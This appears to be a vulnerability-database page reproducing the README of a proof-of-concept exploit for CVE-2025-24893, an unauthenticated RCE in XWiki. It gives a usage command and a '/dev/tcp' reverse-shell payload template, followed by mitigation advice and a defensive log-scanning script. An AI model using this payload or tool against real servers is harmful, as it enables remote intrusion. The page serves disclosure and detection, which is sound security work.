Associated vulnerability
Description
Proof-of-Concept exploit for CVE-2025-24893, an unauthenticated Remote Code Execution (RCE) vulnerability in XWiki. Exploits a template injection flaw in the SolrSearch endpoint via Groovy script execution.
Introduction
# CVE-2025-24893 — XWiki Unauthenticated RCE (PoC)
Proof-of-Concept exploit for **CVE-2025-24893**, a critical unauthenticated **Remote Code Execution** vulnerability in **XWiki**.
This exploit abuses a Groovy template injection in the `SolrSearch` endpoint to execute arbitrary commands — including reverse shells — without authentication.
## 💥 Vulnerability Details
A flaw in how XWiki handles crafted input to the `SolrSearch` RSS endpoint allows attackers to inject Groovy code into the rendering pipeline.
This enables **unauthenticated RCE** via `{{groovy}}` script blocks.
### ✅ Affected Versions
- `< 15.10.11`
- `>= 16.0.0` and `< 16.4.1`
### ❌ Fixed in
- `15.10.11`
- `16.4.1`
---
## 🔧 Usage
Download the release:
[Releases](https://github.com/investigato/cve-2025-24893-poc/releases/tag/v0.1.0)
or build from source:
```bash
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
```
### Reverse Shell Payload
The prebuilt reverse shell payload has this form:
`bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1'`
---
## ⚠️ Legal Disclaimer
This code is for **educational and authorized security research only**.
Do **not** use this exploit against systems you do not own or have explicit permission to test.
---
## ✍️ Credits
- Exploit PoC by [Artemir7](https://github.com/Artemir7/CVE-2025-24893-EXP)
- Rust port by investigato
---
## 🛡️ Detection & Mitigation
- Update to **XWiki 15.10.11** or **16.4.1+**
- Monitor suspicious use of `/bin/get/Main/SolrSearch?media=rss`
- Disable Groovy execution for anonymous users if possible
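Detection logic for the monitoring point above, added here as an example (not code from the PoC repository). It assumes Apache/nginx combined-format access logs; the log lines and the `text` parameter name are constructed for the sample, and the check scans the whole decoded request target rather than one parameter.

```python
"""Flag XWiki SolrSearch RSS requests that carry Groovy macro markup in access logs."""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Request line inside a combined-format log entry: "METHOD TARGET HTTP/x.y"
_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
ENDPOINT = "/bin/get/Main/SolrSearch".lower()
MARKER = "{{groovy"  # opening of the macro named in the advisory text above


def normalize(target: str) -> str:
    """URL-decode up to twice and lower-case, so %7B%7B, %257B%257B and {{GROOVY}} compare equal."""
    out = target
    for _ in range(2):  # second pass catches double-encoded evasion
        decoded = unquote(out)
        if decoded == out:
            break
        out = decoded
    return out.lower()


def classify(line: str) -> Optional[str]:
    """Return 'rce-attempt', 'rss-endpoint' or None for one access-log line."""
    m = _REQ_RE.search(line)
    if not m:
        return None
    target = normalize(m.group("target"))
    if ENDPOINT not in target:
        return None
    if MARKER in target:
        return "rce-attempt"          # Groovy macro aimed at the vulnerable endpoint
    return "rss-endpoint" if "media=rss" in target else None  # baseline RSS usage


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, verdict) for every line that touches the endpoint."""
    return [(i, v) for i, line in enumerate(lines, 1) if (v := classify(line))]


# Constructed sample log lines (not real traffic); payload body is a placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "GET /bin/view/Main/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [01/Jan/2025:10:00:02 +0000] "GET /bin/get/Main/SolrSearch?media=rss&text=release+notes HTTP/1.1" 200 2048 "-" "FeedReader/1.0"',
    '203.0.113.9 - - [01/Jan/2025:10:00:03 +0000] "GET /bin/get/Main/SolrSearch?media=rss&text=%7B%7Bgroovy%7D%7DPLACEHOLDER%7B%7B/groovy%7D%7D HTTP/1.1" 200 1801 "-" "curl/8.0"',
    '203.0.113.9 - - [01/Jan/2025:10:00:04 +0000] "GET /bin/get/Main/SolrSearch?media=rss&text=%257B%257Bgroovy%257D%257DPLACEHOLDER HTTP/1.1" 200 1801 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for lineno, verdict in scan(SAMPLE_LOG):
        print(f"line {lineno}: {verdict}")
```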
File snapshot
[4.0K] /data/pocs/ccf20b542b2e509842383ed9ab6a681e8b9a474f
├── [ 45K] Cargo.lock
├── [ 424] Cargo.toml
├── [1.6K] README.md
└── [4.0K] src
    └── [3.9K] main.rs
1 directory, 4 files
Notes
1. It is recommended to access the original source first.
2. If the source is unavailable or cannot be accessed, please send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.